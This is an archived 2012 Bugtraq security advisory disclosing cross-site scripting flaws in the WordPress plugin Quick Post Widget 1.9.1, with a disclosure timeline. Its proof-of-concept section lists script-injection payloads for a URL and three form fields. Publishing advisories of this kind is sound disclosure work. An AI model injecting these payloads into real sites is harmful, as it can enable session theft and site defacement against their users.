lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201208100734.q7A7YkKi004236@sf01web3.securityfocus.com>
Date: Fri, 10 Aug 2012 07:34:46 GMT
From: sschurtz@...ksecurity.de
To: bugtraq@...urityfocus.com
Subject: WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site
 scripting vulnerabilities

Advisory:		WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities
Advisory ID:		SSCHADV2012-016
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Quick Post Widget 1.9.1
Vendor URL:		http://qpw.famvanakkeren.nl/
Vendor Status:		informed
CVE-ID:			CVE-2012-4226

==========================
Vulnerability Description
==========================

The WordPress plugin Quick Post Widget 1.9.1 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

// GET
http://[target]/wordpress/?"></script><script>alert(/xss/)</script>

// POST 
http://[target]/wordpress/ -> Quickpost 'Title' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'Content' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'New category' -> "></script><script>alert(/xss/)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

02-Jul-2012 - developer informed
09-Jul-2012 - developer feedback
10-Aug-2012 - post on BugTraq

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-016.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ